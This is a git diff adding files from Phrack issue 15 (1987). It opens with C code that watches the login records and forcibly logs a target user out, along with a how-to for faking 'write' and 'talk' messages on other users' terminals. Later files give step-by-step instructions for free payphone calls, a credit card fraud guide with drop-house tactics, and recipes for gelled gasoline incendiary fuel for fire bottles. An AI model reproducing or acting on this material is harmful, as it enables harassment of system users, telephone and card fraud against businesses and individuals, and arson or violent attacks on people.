+}
+
+
+while (read(fp, &user, sizeof user) > 0) {
+if (isprint(user.ut_name[0])) {
+if (!(strcmp(user.ut_name,av[1]))) {
+
+printf("%s is logging in...",user.ut_name);
+sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
+printf("%s\n",buf);
+if (access(buf,W_OK) == -1) {
+printf("failed - program aborting.\n");
+exit(-1);
+}
+else {
+if ((target = open(buf,O_WRONLY)) != EOF) {
+sprintf(buf2,"stty 0 > %s",buf);
+system(buf2);
+printf("killed.\n");
+sleep(10);
+}
+
+} /* else */
+} /* if strcmp */
+} /* if isprint */
+} /* while */
+close(fp);
+
+/*sleep(SLEEP);  */
+
+} /* for */
+
+
+
+
+
+}
+
+----- cut here -----
+
+
+--  ------------- ----- ----- ---- ------  --- ------
+2.  Impersonating other users with 'write' and 'talk'
+--  ------------- ----- ----- ---- ------  --- ------
+
+This next trick wasn't exactly a work of stupefying genius, but is a little
+trick (that anybody can do) that I sometimes use to amuse myself and, as with
+the above, annoy the hell out of my friends and enemies.
+
+Nearly every Unix system has the 'write' program, for conversing with other
+logged-in users.  As a quick summary:
+
+If you see that user 'clara' is logged in with the 'who' or 'w' command or
+whatever, and you wish to talk to her for some reason or another, you'd type
+'write clara'.  Clara then would see on her screen something like this (given
+that you are username 'shark'):
+
+
+[3 ^G's] Message from shark on ttyi13 at 23:14 ...
+
+You then type away at her, and whatever you type is sent to her terminal
+line-by-line.  If she wanted to make it a conversation rather than a
+monologue, she'd type 'write shark,' you'd get a message similar to the above
+on your terminal, and the two of you would type away at each other to your
+little heart's content.  If either one of you wanted to end the conversation,
+you would type a ^D.  They would then see the characters 'EOF' on their
+screen, but they'd still be 'write'ing to you until they typed a ^D as well.
+
+Now, if you're on a bigger installation you'll probably have some sort of
+full-screen windowing chat program like 'talk'.  My version of talk sends the
+following message:
+
+Message from Talk_Daemon@tibsys at 23:14 ...
+talk: connection requested by shark@tibsys.
+talk: respond with:  talk shark@tibsys
+
+Anyway, here's where the fun part begins:  It's quite easy to put a sample
+'write' or 'talk' message into a file and then edit so that the 'from' is a
+different person, and the tty is listed differently.  If you see that your
+dorky friend roger is on ttyi10 and the root also happens to be logged on on
+ttyi01, make the file look something like this:
+
+[3 control-G's] Message from root on ttyi01 at [the current time]
+
+wackawackawackawackawacka!!!
+
+[or a similarly confusing or rude message...]
+
+EOF
+
+Then, send this file to roger's terminal with:
+
+cat filename > /dev/ttyi10
+
+He'll get the message on his terminal and wonder what the hell the superuser
+is talking about.  He might even 'write' back to the superuser with the intent
+of asking 'what the hell are you talking about?'.  For maximum effectiveness,
+*simultaneously* send a message to root 'from' roger at the appropriate
+terminal with an equally strange message - they'll then engage in a
+conversation that will go something like "what did you mean by that?"  "what
+do you mean, what do I mean?  What did *you* mean by that?" etc.  A splendid
+time is guaranteed for all!  Note that you don't have to make 'root' the
+perpetrator of the gag, any two currently logged-in users who have their
+terminals open for messages can join in on the fun.
+
+Similarly, you can fake a few 'talk' pages from/to two people...they will then
+probably start talking...although the conversation will be along the lines of
+"what do you want?"  "you tell me."  "you paged me, you tell *me." etcetera,
+while you laugh yourself silly or something like that.
+
+A variation on the theme:  As I said, when using 'write' you type a ^D to end
+the conversation, and the person you're typing at sees an 'EOF' on their
+screen.  But you could also just *type* 'EOF', and they'd think you've
+quit...but you still have an open line to their terminal.  Even if they later
+turn messages off, you still have the ability to write to their terminal.
+Keeping this fact in mind, anybody who knows what they're doing can write a
+program similar to my 'block' program above that doesn't log a user out when
+they appear on the system, but opens their tty as a device and keeps the file
+handle in memory so you can redirect to their terminal - to write rude
+messages or to log them out or whatever - at any time, until they log out.
+
+As I said, there was no great amount of genius in the above discourse, but
+it's a pastime I enjoy occasionally...
+
+-- Shooting Shark
+
+
+"the first fact to face is that unix was not developed with security, in any
+realistic sense, in mind..."
+
+-- Dennis M. Ritchie
+
+"Oryan QUEST couldn't hack his way out of a UNIX system, let alone into one."
+
+-- Tharrys Ridenow
diff --git a/phrack15/3.txt b/phrack15/3.txt
new file mode 100644
index 0000000..014923c
--- /dev/null
+++ b/phrack15/3.txt
@@ -0,0 +1,125 @@
+                ===== Phrack Magazine presents Phrack 15 =====
+
+                         ===== File 3 of 8 =====
+
+*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
+*                                                                       *
+*            How to "Steal" Local Calls from Most Payphones             *
+*                                                                       *
+*                            August 25, 1987                            *
+*                                                                       *
+*                   By Killer Smurf and Pax Daronicus                   *
+*                                                                       *
+*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
+
+     Most of you have seen WarGames, right? Remember the part where David
+was stranded in Colorado and needed to call his girlfriend in Seattle? We
+knew you did.  If you didn't, what David done was unscrew the  mouthpiece
+on  the payphone and make some connection between the mouthpiece and  the
+phone.  Well... that was pretty close to reality except for two things...
+1> Nowadays,  mouthpieces are un-unscrewable, and 2> You cannot make long
+distance  or toll calls using that method.  Maybe that DID work on  older
+phones, but you know Ma Bell.  She always has a damn cure for every thing
+us Phreaks do.  She glued on the mouthpiece!
+
+     Now to make free local calls, you need a  finishing nail.  We highly
+recommend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32 of an
+inch  in diameter and 2 inches long (of course).  You also need  a  large
+size  paper  clip.  By  large  we  mean they  are  about  2  inches  long
+(FOLDED).  Then  you  unfold the paper clip.  Unfold it  by  taking  each
+piece  and  moving  it out 90 degrees.  When it is done  it  should  look
+somewhat like this:
+                             /----------\
+                             :          :
+                             :          :
+                             :          :
+                             :          :
+                             \-----
+
+     Now,  on to the neat stuff.  What you do,  instead of unscrewing the
+glued-on  mouthpiece,  is  insert the nail into the center  hole  of  the
+mouthpiece  (where you talk) and push it in with pressure or just  hammer
+it in by hitting the nail on something.  Just DON'T KILL THE  MOUTHPIECE!
+You  could  damage  it if you insert the nail too far or  at  some  weird
+angle.  If  this happens then the other party won't be able to hear  what
+you say.
+     You now have a hole in the mouthpiece in which you can easily insert
+the  paper clip.  So, take out the nail and put in the paper  clip.  Then
+take  the other end of the paper clip and shove it under the rubber  cord
+protector at the bottom of the handset (you know, the blue guy...).  This
+should end up looking remotely like...like this:
+
+                             /----------\      Mouthpiece
+                             :          :      /
+             Paper clip -->  :          :     /
+                             :      /---:---\
+                             :      :   :   :------------>
+         ====================\---))):       :  To earpiece ->
+                   ^              ^ \-------------------->
+                   :              :
+                   :              :
+                 Cord          Blue guy
+
+(The  paper clip is shoved under the blue guy to make a  good  connection
+between the inside of the mouthpiece and the metal cord.)
+
+     Now,  dial  the number of a local number you wish to  call,  sayyyy,
+MCI.  If  everything  goes okay, it should ring and not answer  with  the
+"The Call You Have Made Requires a 20 Cent Deposit" recording.  After the
+other  end  answers  the phone, remove the  paper  clip.  It's  all  that
+simple, see?
+
+     There  are  a couple problems,  however.  One  is,  as  we mentioned
+earlier, the mouthpiece not working after you punch it.  If this  happens
+to you,  simply move on to the next payphone.  The one you are now on  is
+lost.  Another problem is that the touch tones won't work when the  paper
+clip is in the mouthpiece. There are two ways around this..
+     A> Dial the first 6 numbers.  This should be done without the  paper
+clip making the connection, i.e., one side should not be connected.  Then
+connect  the paper clip,  hold down the last digit,  and slowly pull  the
+paper clip out at the mouthpiece's end.
+     B> Don't  use  the paper clip at all.  Keep the nail  in  after  you
+punch it.  Dial the first 6 digits.  Before dialing the last digit, touch
+the nail head to the plate on the main body of the phone,  the money safe
+thingy..then press the last number.
+
+     The  reason  that this method is sometimes called  clear  boxing  is
+because  there is another type of phone which lets you actually make  the
+call  and  listen  to  them say "Hello,  hello?"  but  it  cuts  off  the
+mouthpiece  so  they can't hear you.  The Clear Box is used  on  that  to
+amplify your voice signals and send it through the earpiece.  If you  see
+how  this  is even slightly similar to the method we  just  described  up
+there, kindly explain it to US!! Cause WE don't GET IT!
+
+     Anyways,  this DOES work on almost all single slot,  Dial Tone First
+payphones (Pacific Bell for sure).  We do it all the time.  This  is  the
+least,  WE STRESS *LEAST*, risky form of Phreaking.  And remember.  There
+are other Phreaks like you out there who have read this article and punch
+payphones, so look before you punch, and save time.
+
+     If  you feel the insane desire to have to contact us to bitch at  us
+for  some  really stupid mistake in this article,  you can  reach  us  at
+Lunatic Labs Unltd...415/278-7421.  It should be up for quite a while..
+
+
+     Also,  if you think of any new ideas that can be used in conjunction
+with this method, such as calling a wrong number on purpose and demanding
+your quarter back from the 0perator,  tell us!!  Post it on Looney!!  Oh,
+and if this only works on Pac Bell phones, tell us also!  Thanks for your
+time, upload this to every board you can find.  You may use this material
+in any publication - electronic, written, or otherwise without consent of
+the authors as long as it is reproduced in whole, with all credit to the
+authors (us!) and Lunatic Labs.  And now, the Bullshit:
+
+_________________________________________________________________________
+
+DISCLAIMER: This  disclaimer disclaims that this article was written  for
+            your information only.  Any injuries resulting from this file
+            (punctured hands, sex organs, etc.) is NOT OUR FAULT! And  of
+            course  if you get really stupidly busted in any way  because
+            of this, it ain't our fault either.  You're the dumb ass with
+            the  nail.  So, proceed with care, but...  HELL!  Have  fun.
+            Later...
+_________________________________________________________________________
+
+
diff --git a/phrack15/4.txt b/phrack15/4.txt
new file mode 100644
index 0000000..e59cae7
--- /dev/null
+++ b/phrack15/4.txt
@@ -0,0 +1,214 @@
+                ===== Phrack Magazine presents Phrack 15 =====
+
+                           ===== File 4 of 8 =====
+
+
+
+
+
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~                             The Disk Jockey                                ~
+~                                                                            ~
+~                                presents:                                   ~
+~                                                                            ~
+~                          Advanced Carding XIV:                             ~
+~              Clarification of Many Credit Card Misconceptions              ~
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                             (A 2af Presentation)
+Preface:
+-------
+     After reading files that have been put out by various groups and
+individuals concerning carding, credit fraud, and the credit system in
+general, I am finding more and more that people are basing these files on
+ideas, rather than knowing how the system actually works.  In this article I
+hope to enlighten you on some of the grey areas that I find most people either
+do not clarify, or don't know what they are talking about.  I can safely say
+that this will be the most accurate file available dealing with credit fraud.
+I have worked for and against credit companies, and know how they work from
+the insiders point of view, and I have yet to meet someone in the modem world
+that knows it better.
+
+This file is dedicated to all the phreaks/hacks that were busted for various
+reasons in the summer of 1987.
+
+
+Obtaining Cards:
+---------------
+     Despite popular belief, there IS a formula for Visa and Mastercard
+numbers.  All credit card account numbers are issued by on issuing company, in
+this case, Visa or Mastercard.  Although the banks are not aware of any type
+of pattern to the account numbers, there IS one that can be found.  I plan to
+publish programs in the near future that will use the various formulas for
+Visa, Mastercard and American Express to create valid accounts.
+
+Accounts:
+--------
+     All that is needed to successfully use a Visa/MC account is the account
+number itself.  I don't know how many times I have gotten into arguments with
+people over this, but this is the way it is.  I'll expand on this.
+
+First of all, on all Visa/MC cards, the name means NOTHING.  NOTHING AT ALL.
+You do not need this name and address of the cardholder to successfully use
+the account, at no time during authorization is the name ever needed, and with
+over 50,000 banks, credit unions, and various other financial institutions
+issuing credit cards, and only 5 major credit verification services, it is
+impossible to keep personal data on each cardholder.
+
+Ordering something and having it sent with the real cardholder's name is only
+going to make things more difficult, at best.  There is no way that you can
+tell if the card is a normal card, or a premium (gold) card merely by looking
+at the account number.  The only thing that can be told by the account number
+is the bank that issued the card, but this again, is not needed.
+
+The expiration date means nothing.  Don't believe me?  Call up an
+authorization number and check a card and substitute 12/94, and if the account
+number is good, the card will pass.  The expiration date is only a binary-type
+check to see if the card is good, (Yes/No), it is NOT a checksum-type check
+code that has to be matched up to the card account to be valid.
+
+Carding Stupid Things:
+---------------------
+     Whenever anyone, ANYONE tries to card something for the first time, they
+ALWAYS want to get something for their computer.  This is nice and all, but
+just think that every person that has ever tried to card has tried to get a
+hard drive and a new modem.  Everyone does it, thus every single computer
+company out there is aware and watching for that.  If I could give every
+single person who ever tries to card one piece of advice, it would be to NEVER
+order computer equipment.  I know there are a hundred guys that will argue
+with me about it, but common sense should tell you that the merchants are
+going to go out of there way to check these cards.
+
+Merchant Checking:
+-----------------
+     Since I brought up merchants checking the cards, I will review the two
+basic ways that almost all mail-order merchants use.  Keep these in mind when
+designing your name, address and phone number for your drop.
+
+The Directory Assistance Cross-Reference:
+----------------------------------------
+     This method is most popular because it is cheap, yet effective.  You can
+usually tell these types of checks because during the actual order, you are
+asked questions such as "What is your HOME telephone number" and your billing
+address.  Once they have this information, they can call directory assistance
+for your area code, say 312, and ask "May I have the phone number for a Larry
+Jerutis at 342 Stonegate Drive?"  Of course, the operator should give a number
+that matches up with the one that you gave them as your home number.  If it
+doesn't, the merchant knows that something is up.  Even if it is an unlisted
+number, the operator will say that there is a Jerutis at that address, but the
+telephone number is non-published, which is enough to satisfy the merchant.
+If a problem is encountered, the order goes to a special pile that is actually
+called and the merchant will talk to the customer directly.  Many merchants
+have policy to not ship at all if the customer can not provide a home phone
+number that corresponds with the address.
+
+The Call Back:
+-------------
+     This deals with the merchant calling you back to verify the order.  This
+does not imply, however, that you can stand by a payphone and wait for them to
+call back.  Waiting by a payphone is one of the stupidest things I have ever
+heard of, being that few, if any, places other than the pizza place will call
+back immediately like that.  What most places will do is process your order,
+etc, and then call you, sometimes it's the next day, sometimes that night.  It
+is too difficult to predict when they will call back, but if they don't get a
+hold of you, or only get a busy, or an answering machine, they won't send the
+merchandise until they speak with you voice.  This method is difficult to
+defeat, but fortunately, due to the high cost of phone bills, the directory
+assistance method is preferred.
+
+Billing Address:
+---------------
+     This should ALWAYS be the address that you are having the stuff sent to.
+One of the most stupidest things that you could do to botch up a carding job
+would be to say something like "Well, I don't want it sent to my house, I want
+it sent to....", or "Well, this is my wife's card, and her name is....".
+These methods may work, but for the most part, only rouse suspicion on you.
+If the order sounds pretty straightforward, and there isn't any unusual
+situations, it will better the chances of the order going through.
+
+Drop Houses:
+-----------
+     These are getting harder and harder to come by for the reasons that
+people are more careful then before, and that UPS is smarter, also.  Your best
+bet is to hit somebody that just moved, and I mean JUST moved, being that UPS
+will not know that there is nobody at the house anymore if it is within, say,
+a week of their moving.  It's getting to the point where in some areas, UPS
+won't even leave the stuff on the doorstep, due to liability on their part of
+doing that. The old "Leave the stuff in the shrubs while I am at work" note
+won't work, most people are smart enough to know that something is odd, and
+will more than likely leave the packages with the neighbors before they shove
+that hard drive in the bushes.  Many places, such as Cincinnati Microwave
+(maker of the Escort and Passport radar detectors) require a signature when
+the package is dropped off, making it that much harder.
+
+Best Bet:
+--------
+     Here is the method that I use that seems to work well, despite it being a
+little harder to match up names and phone numbers.  Go to an apartment
+building and go to the top floor.  The trashier the place, the better.  Knock
+on the door and ask if "Bill" is there.  Of course, or at least hopefully,
+there will be no Bill at that address.  Look surprised, then say "Well, my
+friend Bill gave me this address as being his."  The occupants will again say
+"Sorry, but there is no Bill here...".  Then, say that "I just moved here to
+go to school, and I had my parents sent me a bunch of stuff for school here,
+thinking that this was Bill's place."  They almost always say "Oh Boy...".
+Then respond with "Well, if something comes, could you hold on to it for me,
+and I will come by in a week and see if anything came?"  They will always say
+something to the effect of "Sure, I guess we could do that...".  Thank them a
+million times for helping you out, then leave.  A few days after your stuff
+comes, drop by and say, "Hi, I'm Jim, did anything come for me?".  If
+everything was cool, it should have.  The best thing to do with this is only
+order one or two small things, rather than an AT system with an extra monitor.
+People feel more comfortable about signing for something small for someone,
+rather than something big, being that most people naturally think that the
+bigger it is, the more expensive it is.
+     This is the best method that I know of, the apartment occupants will
+usually sign for the stuff, and be more than happy to help you out.
+
+Advice:
+------
+     The thing that I can never stress enough is to not become greedy.  Sure,
+the first shipment may come in so easy, so risk-free that you feel as if you
+can do it forever.  Well, you can't.  Eventually, if you do it frequently
+enough, you will become the subject of a major investigation by the local
+authorities if this becomes a real habit.  Despite anything that anyone ever
+tells you about the police being "stupid and ignorant", you better reconsider.
+The police force is a VERY efficient organization once they have an idea as to
+who is committing these crimes.  They have the time and the money to catch
+you.
+
+Don't do it with friends.  Don't even TELL friends that you are doing it. This
+is the most stupid, dangerous thing that you could do.  First of all, I don't
+care how good of friends anyone may be, but if a time came that you hated each
+other, this incident could be very bad for you.  What could be even worse is a
+most common scenario:  You and a friend get a bunch of stuff, very
+successfully.  You tell a few friends at school, either you or him have to
+tell only one person and it gets all over.  Anyways, there is ALWAYS some type
+of informant in every high-school.  Be it a teacher, son or daughter of a cop,
+or whatever, there is always a leak in every high school.  The police decide
+to investigate, and find that it is becoming common knowledge that you and/or
+your friend have ways of getting stuff for "free" via the computer.  Upon
+investigation, they call in your friend, and tell him that they have enough
+evidence to put out a warrant for his arrest, and that they might be able to
+make a deal with him.  If he gives a complete confession, and be willing to
+testify against your in court, they will let him off with only paying the
+restitution (paying for the stuff you got).  Of course, just about anyone is
+going to think about themselves, which is understandable, and you will get the
+raw end of the deal.  Don't let anyone ever tell you that as a minor, you
+won't get in any trouble, because you can and will.  If you are really
+uncooperative, they may have you tried as an adult, which would really put you
+up the creek, and even as a juvenile, you are eligible to receive probation,
+fines, court costs, and just about anything else the judge wants to do with
+you.  All this boils down to is to not tell anyone anything, and try not to do
+it with anyone.
+
+
+Well, that should about wrap up this file.  I hope this clears up some
+misconceptions about carding.  I am on many boards, and am always open to any
+comments/suggestions/threats that anyone might have.  I can always be reached
+on The Free World II (301-668-7657) or Lunatic Labs (415-278-7421).
+
+Good luck.
+
+                                                 -The Disk Jockey
diff --git a/phrack15/5.txt b/phrack15/5.txt
new file mode 100644
index 0000000..fd73603
--- /dev/null
+++ b/phrack15/5.txt
@@ -0,0 +1,393 @@
+                ===== Phrack Magazine presents Phrack 15 =====
+
+                         ===== File 5 of 8 =====
+
+
+
+
+
+
+
+
+
+
+                        GELLED FLAME FUELS
+                        ------------------
+
+        A text phile typed by Elric of Imrryr from the book:
+        Improvised Munitions Handbook (TM 31-210), published
+        by the Dept of the Army, 1969.
+        All information is provided only for information purposes
+        only. Construction and/or use may violate local, state, and/or
+        federal laws. (Unless your name is Ollie North)
+
+
+
+        Gelled or paste type fuels are often preferable to raw gasoline for
+use in incendiary devices such as fire bottles.  This type fuel adheres more
+readily to the target and produces greater heat concentration.
+
+        Several methods are shown for gelling gasoline using commonly
+available materials.  The methods are divided into the following categories
+based on the major ingredient:
+
+                1. Lye Systems
+
+                2. Lye-Alcohol Systems
+
+                3. Soap-Alcohol Systems
+
+                4. Egg White Systems
+
+                6. Wax Systems
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+                                   Lye Systems
+
+    Lye (also know as caustic soda or Sodium Hydroxide) can be used in
+combination with powdered rosin or castor oil to gel gasoline for use as a
+flame fuel which will adhere to target surfaces.
+
+
+
+
+
+MATERIALS REQUIRED:
+------------------
+
+Parts by Volume   Ingredient    How Used         Common Source
+---------------   ----------    --------         -------------
+
+60                Gasoline      Motor Fuel       Gas station or motor vehicle
+
+2 (flake) or      Lye           Drain cleaner,   Food store or Drug store
+1 (powder)                      making of soap
+
+15                Rosin         Manufacturing    Paint store, chemical supply
+                                Paint & Varnish  house
+
+                  or
+
+                  Castor Oil    Medicine         Food and Drug stores
+
+
+PROCEDURE
+---------
+
+______________________________________________________________________________
+|CAUTION:  Make sure that there are no open flames in the area when mixing   |
+|the flame fuel.  NO SMOKING!                                                |
+|----------------------------------------------------------------------------|
+
+1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
+   CONTAINER.)
+
+2. IF rosin is in cake form, crush into small pieces.
+
+3. Add rosin or castor oil to the gasoline and stir for about five minutes to
+   mix thoroughly.
+
+4. In a second container (NOT ALUMINUM) add lye to an equal volume of water
+   slowly with stirring.
+
+______________________________________________________________________________
+|CAUTION:  Lye solution can burn skin and destroy clothing.  If any is       |
+|spilled, wash away immediately with large quantities of water.              |
+|----------------------------------------------------------------------------|
+
+5. Add lye solution to the gasoline mix and stir until mixture thickens (about
+   one minute).
+
+NOTE:  The sample will eventually thicken to a very firm paste.  This can be
+       thinned, if desired, by stirring in additional gasoline.
+
+
+
+
+
+
+                                   Lye-Alcohol Systems
+
+    Lye (also know as caustic soda or Sodium Hydroxide) can be used in
+combination with alcohol and any of several fats to gel gasoline for use as a
+flame fuel.
+
+
+
+
+
+MATERIALS REQUIRED:
+------------------
+
+Parts by Volume   Ingredient    How Used         Common Source
+---------------   ----------    --------         -------------
+
+60                Gasoline      Motor Fuel       Gas station or motor vehicle
+
+2 (flake) or      Lye           Drain cleaner,   Food store or Drug store
+1 (powder)                      making of soap
+
+3                 Ethyl Alcohol Whiskey          Liquor store
+                                Medicine         Drug store
+
+NOTE:  Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
+       for ethyl alcohol, but their use produces softer gels.
+
+14                Tallow        Food             Fats rendered by cooking the
+                                Making of soap   meat or suet of animals.
+
+NOTE: The following can be substituted for the tallow:
+
+        (a) Wool grease (Lanolin) (very good) -- Fat extracted from sheep wool
+        (b) Castor Oil (good)
+        (c) Any vegetable oil (corn, cottonseed, peanut, linseed, etc.)
+        (d) Any fish oil
+        (e) Butter or oleo margarine
+
+It is necessary when using substitutes (c) to (e) to double the given amount
+of fat and of lye for satisfactory body.
+
+PROCEDURE
+---------
+
+______________________________________________________________________________
+|CAUTION:  Make sure that there are no open flames in the area when mixing   |
+|the flame fuel.  NO SMOKING!                                                |
+|----------------------------------------------------------------------------|
+
+1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
+   CONTAINER.)
+
+2. Add tallow (or substitute) to the gasoline and stir for about 1/2 minute to
+   dissolve fat.
+
+3. Add alcohol to the gasoline mixture.  Mix thoroughly.
+
+4. In a separate container (NOT ALUMINUM) slowly add lye to an equal volume of
+   water.  Mixture should be stirred constantly while adding lye.
+
+______________________________________________________________________________
+|CAUTION:  Lye solution can burn skin and destroy clothing.  If any is       |
+|spilled, wash away immediately with large quantities of water.              |
+|----------------------------------------------------------------------------|
+
+5. Add lye solution to the gasoline mixture and stir occasionally until
+thickened (about 1/2 hour)
+
+NOTE:  The sample will eventually (1 to 2 days) thicken to a very firm paste.
+       This can be thinned, if desired, by stirring in additional gasoline.
+
+
+
+
+
+                                   Soap-Alcohol System
+
+        Common household soap can be used in combination with alcohol to gel
+gasoline for use as a flame fuel which will adhere to target surfaces.
+
+
+
+
+
+
+MATERIALS REQUIRED:
+------------------
+
+Parts by Volume   Ingredient    How Used         Common Source
+---------------   ----------    --------         -------------
+
+36                Gasoline      Motor Fuel       Gas station or motor vehicle
+
+1                 Ethyl Alcohol Whiskey          Liquor store
+                                Medicine         Drug store
+
+NOTE:  Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
+       for ethyl alcohol.
+
+20 (powdered) or  Laundry soap  Washing clothes  Stores
+28 (flake)
+
+NOTE:  Unless the word "soap" actually appears somewhere on the container or
+wrapper, a washing compound is probably a detergent. THESE CAN NOT BE USED.
+
+
+PROCEDURE
+---------
+
+______________________________________________________________________________
+|CAUTION:  Make sure that there are no open flames in the area when mixing   |
+|the flame fuel.  NO SMOKING!                                                |
+|----------------------------------------------------------------------------|
+
+1. If bar soap is used, carve into thin flakes using a knife.
+
+2. Pour Alcohol and gasoline into a jar, bottle or other container and mix
+   thoroughly.
+
+3. Add soap powder or flakes to gasoline-alcohol mix and stir occasionally
+   until thickened (about 15 minutes).
+
+
+
+
+                                   Egg System
+
+The white of any bird egg can be used to gel gasoline for use as a flame fuel.
+
+
+
+
+
+MATERIALS REQUIRED:
+------------------
+
+Parts by Volume   Ingredient    How Used         Common Source
+---------------   ----------    --------         -------------
+
+85                Gasoline      Motor Fuel       Gas station or motor vehicle
+
+14                Egg Whites    Food             Food store, farms
+
+Any one of the following
+
+1                 Table Salt    Food, industrial Sea Water, Natural brine,
+                                processes        Food stores
+
+3                 Ground Coffee Food             Food store
+
+3                 Dried Tea     Food             Food store
+                  Leaves
+
+3                 Cocoa         Food             Food store
+
+2                 Sugar         Food             Food store
+
+1                 Saltpeter     Pyrotechnics     Drug store
+                  (Niter)       Explosives       chemical supply store
+                  (Potassium    Matches
+                  Nitrate)      Medicine
+
+1                 Epsom salts   Medicine         Drug store, food store
+                                industrial
+                                processes
+
+2                 Washing soda  Washing cleaner  Food store
+                  (Sal soda)    Medicine         Drug store
+                                Photography      Photo supply store
+
+1 1/2             Baking soda   Baking           Food store
+                                Manufacturing:   Drug store
+                                Beverages,
+                                Mineral waters,
+                                and Medicine
+
+1 1/2             Aspirin       Medicine         Drug store
+                                                 Food store
+
+
+PROCEDURE
+---------
+
+______________________________________________________________________________
+|CAUTION:  Make sure that there are no open flames in the area when mixing   |
+|the flame fuel.  NO SMOKING!                                                |
+|----------------------------------------------------------------------------|
+
+1. Separate egg white from yolk.  This can be done by breaking the egg into a
+   dish and carefully removing the yolk with a spoon.
+
+
+______________________________________________________________________________
+|NOTE:  DO NOT GET THE YELLOW EGG YOLK MIXED INTO THE EGG WHITE.  If egg yolk|
+|gets into the egg white, discard the egg.                                   |
+|----------------------------------------------------------------------------|
+
+2. Pour egg white into a jar, bottle, or other container and add gasoline.
+
+3. Add the salt (or other additive) to the mixture and stir occasionally until
+   gel forms (about 5 to 10 minutes).
+
+NOTE:  A thicker flame fuel can be obtained by putting the capped jar in hot
+       (65 C) water for about 1/2 hour and then letting them cool to room
+       temperature.  (DO NOT HEAT THE GELLED FUEL CONTAINING COFFEE).
+
+
+
+
+
+                                   Wax System
+
+        Any of several common waxes can be used to gel gasoline for use as a
+flame fuel.
+
+
+
+
+
+MATERIALS REQUIRED:
+------------------
+
+Parts by Volume   Ingredient    How Used         Common Source
+---------------   ----------    --------         -------------
+
+80                Gasoline      Motor Fuel       Gas station or motor vehicle
+
+20                Wax           Leather polish,  Food store, drug store,
+                  (Ozocerite,   sealing wax,     department store
+                  Mineral wax,  candles,
+                  fossil wax,   waxed paper,
+                  ceresin wax   furniture &
+                  beeswax)      floor waxes,
+                                lithographing.
+
+PROCEDURE
+---------
+
+1. Melt the wax and pour into jar or bottle which has been placed in a hot
+   water bath.
+
+2. Add gasoline to the bottle.
+
+3. When wax has completely dissolved in the gasoline, allow the water bath to
+   cool slowly to room temperature.
+
+NOTE:  If a gel does not form, add additional wax (up to 40% by volume) and
+repeat the above steps.  If no gel forms with 40% wax, make a Lye solution by
+dissolving a small amount of Lye (Sodium Hydroxide) in an equal amount of
+water.  Add this solution (1/2% by volume) to the gasoline wax mix and shake
+bottle until a gel forms.
+
+
+
+
+Well, that's it, I omitted a few things because they where either redundant,
+or more aimed toward battle field conditions. Be careful, don't get caught,
+and have fun...
+
+        Elric of Imrryr
diff --git a/phrack15/6.txt b/phrack15/6.txt
new file mode 100644
index 0000000..4872580
--- /dev/null
+++ b/phrack15/6.txt
@@ -0,0 +1,336 @@
+          PWN ^*^ PWN ^*^ PWN {  Final Issue  } PWN ^*^ PWN ^*^ PWN
+          ^*^                                                   ^*^
+          PWN                Phrack World News                  PWN
+          ^*^               Issue XV:  Part One                 ^*^
+          PWN                                                   PWN
+          ^*^          Created, Written, and Edited             ^*^
+          PWN               by Knight Lightning                 PWN
+          ^*^                                                   ^*^
+          PWN ^*^ PWN ^*^ PWN {  Final Issue  } PWN ^*^ PWN ^*^ PWN
+
+Welcome to my final issue of Phrack World News.  Many people are wondering why
+I am giving it up.  There are several reasons, but the most important is that
+I will be going to college and will have little (if any) time for the
+phreak/hack world or PWN.  I doubt I will even be calling any bulletin boards,
+but I may make an occasional call to a few of my friends in the community.
+
+The Phrack Inc. VMS is no longer in service and messages will not be received
+there by anyone.  Phrack Inc. is now in the hands of Sir Francis Drake, Elric
+Of Imrryr, and Shooting Shark.
+
+:Knight Lightning
+______________________________________________________________________________
+
+Dan The Operator; Informant                                      July 27, 1986
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+I'm going to assume that all of you have read PWN 14/2 and the details
+surrounding SummerCon '87.
+
+This article will feature information collected from our investigation and
+quotes from the Noah Tape.
+
+The tape actually has two parts.  The front side has part of an Alliance
+Teleconference in which Noah attempted to gather information by engineering
+hackers.  Side B contains 45 minutes of a conversation between Noah and John
+Maxfield of BoardScan, in which Noah tried to engineer Maxfield into giving
+him information on certain hackers by trading him information on other
+hackers. All of this has been going on for a long time although we are unsure
+as to how long and Noah was not exactly an informant for Maxfield, it was the
+FBI.
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Part One:  Noah Engineers his "friends"
+
+The Alliance teleconference recording has about 7 people on it, but the only
+people I recognized were Dan The Operator, Il Duce (Fiber Optic), Johnny
+Rotten, and The Ninja.
+
+The topics discussed (mostly by Noah) included;
+
+   Bill From RNOC / Catch-22 / Doom Prophet / Force Hackers / John Maxfield
+      Karl Marx / Legion of Doom / Lord Rebel / Neba / Phantom Phreaker
+  Phucked Agent 04 / Silver Spy / SummerCon '87 / The Rebel / The Videosmith
+
+
+Here is a look at some of the conversation;                     [Il Duce=Mark]
+
+------------------------------------------------------------------------------
+Noah:  SILVER SPY, you know him?
+Mark:  Yeah, what about him?
+Noah:  Yeah, Paul.
+
+[This was done to make it look like Noah knew him and was his buddy.-KL]
+------------------------------------------------------------------------------
+Noah:  Anyway, is LORD REBEL part of LOD?
+Mark:  He's not really.
+Noah:  I didn't think so.
+Mark:  Well, he is, he is sort of.
+Noah:  Ah, well what does he know.
+Mark:  Not much.
+Noah:  Why do they care about him, he's just a pirate.
+
+[Look at this dork!  First he tries to act like he knows everything and then
